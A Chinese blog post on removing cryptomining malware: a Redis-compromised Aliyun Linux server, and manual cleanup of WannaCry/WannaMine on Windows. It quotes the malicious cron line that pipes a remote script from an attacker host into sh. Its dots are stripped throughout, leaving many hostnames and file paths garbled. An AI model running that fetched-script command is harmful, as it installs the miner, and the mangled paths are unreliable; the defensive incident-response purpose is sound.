阿里云服务器被挖矿了怎么办?(纯纯电脑小白

阿里云服务器被挖矿了怎么办?(纯纯电脑小白,第1张

1 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmrcrypto-poolfr -j DROP and iptables -A OUTPUT -d xmrcrypto-poolfr -j DROP

2 chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。

3 pkill minerd ,杀掉进程

4 service stop crond 或者 crontab -r 删除所有的执行计划

5 执行top,查看了一会,没有再发现minerd 进程了。

6检查/var/spool/cron/目录下发现有个root用户的定时器文件

下载脚本的语句:

/5 curl -fsSL http://wwwhaveabitchincom/pmsh0105010 | sh

病毒文件内容如下,感兴趣的可以研究下:

 View Code

解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,http://blogjobbolecom/94518/然后就注入了病毒,下面是解决办法和清除工作:

1 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379

配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中

配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度

好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf

2 打开 ~/ssh/authorized_keys, 删除你不认识的账号

3 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉

关于病毒及木马的问题,都说老生常谈的了,这里就不讲逆向分析的东西,网上毕竟太多。就写一下WannaMine20到40的手工处理操作。确实,很多时候都被问的烦了。

WannaCry勒索与WannaMine挖矿,虽然首次发生的时间已经过去很久了,但依旧能在很多家内网见到这两个,各类杀毒软件依旧无法清除干净,但可以阻断外联及删除病毒主体文件,但依然会残留一些。此种情况下,全流量分析设备依旧可以监测到尝试外联,与445端口扫描行为。

WannaCry 在使用杀毒软件及手动清除攻击组件所在目录后,仍需手动cmd命令删除两个系统服务sc delete mssecsvc20与mssecsvc21。

WannaMine 全系使用“永恒之蓝”漏洞,在局域网内快速传播。且高版本会在执行成功后完全清除旧版本。

下图为WannaCry与WannaMine使用的永恒之蓝攻击组件相关文件。

WannaMine20版本

该版本释放文件参考如下:

C:\Windows\SpeechsTracing\Microsoft

C:\Windows\system32\wmassrvdll

C:\Windows\system32\HalPluginsServicesdll

C:\Windows\System32\EnrollCertXamldll 删除系统服务名与DLL文件对应的wmassrv。

WannaMine30版本

该版本释放文件参考如下:

C:\Windows\System32\MarsTraceDiagnosticsxmlC:\Windows\AppDiagnostics\C:\Windows\System32\TrustedHostexexeC:\Windows\System32\snmpstorsrvdll

需删除主服务snmpstorsrv与UPnPHostServices计划任务

WannaMine40版本

该版本释放文件参考如下:

C:\Windows\System32\rdpkaxxsl

C:\Windows\System32\dllhostexexe

C:\Windows\System32\ApplicationNetBIOSClientdll

C:\Windows\SysWOW64\ApplicationNetBIOSClientdll

C:\Windows\SysWOW64\dllhostexexe

C:\Windows\NetworkDistribution

<pre style="margin: 0px; padding: 0px; white-space: pre-wrap !important; overflow-wrap: break-word !important; max-width: 98%;">文件名随机组合参考• 第一部分:Windows、Microsoft、Network、Remote、Function、Secure、Application •第二部分:Update、Time、NetBIOS、RPC、Protocol、SSDP、UPnP •第三部分:Service、Host、Client、Event、Manager、Helper、System •rdp压缩文件随机字符串后缀:xml、log、dat、xsl、ini、tlb、msc</pre>

关于Windows下计划任务与启动项查看方式,建议在使用PCHunter、Autoruns、ProcessHacker等工具无法发现异常的情况下,可以到注册表下查看。

注册表下排查可疑的计划任务

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Schedule\TaskCache\Tree

发现可疑项可至tasks下查看对应ID的Actions值

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\tasks[上传失败(image-e8f3b4-1649809774433)]

计划任务文件物理目录

C:\Windows\System32\Tasks\Microsoft\Windows

新变种病毒有依靠 WMI 类属性存储 ShellCode 进行攻击,Autoruns可以用来检查WMI与启动项并进行删除,在手动删除病毒相关计划任务与启动项时,记得删除相应的文件与注册表ID对应项。

注册表下查看开机启动项

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run或runOnce [上传失败(image-8a357b-1649809774432)]

挖矿病毒完整清除过程如下,请在断网情况下进行:

1停止并禁用Hyper-VAccess Protection Agent Service服务;

2删除C:\Windows\system32\NrsDataCachetlb;

3删除C:\Windows\system32\vmichapagentsrvdll,若删除失败,可重命名该文件为其他名称;

4重启计算机;

5删除C:\Windows\system32\SysprepThemes\和C:\Windows\SysprepThemes\目录;

6删除C:\Windows\system32\SecUpdateHostexe。

7到微软官方网站下载对应操作系统补丁,下载链接如下:https://docsmicrosoftcom/zh-cn/security-updates/Securitybulletins/2017/ms17-010

8安装国内主流杀毒软件,及时更新至最新病毒特征库。

DABAN RP主题是一个优秀的主题,极致后台体验,无插件,集成会员系统
网站模板库 » 阿里云服务器被挖矿了怎么办?(纯纯电脑小白

0条评论

发表评论

提供最优质的资源集合

立即查看 了解详情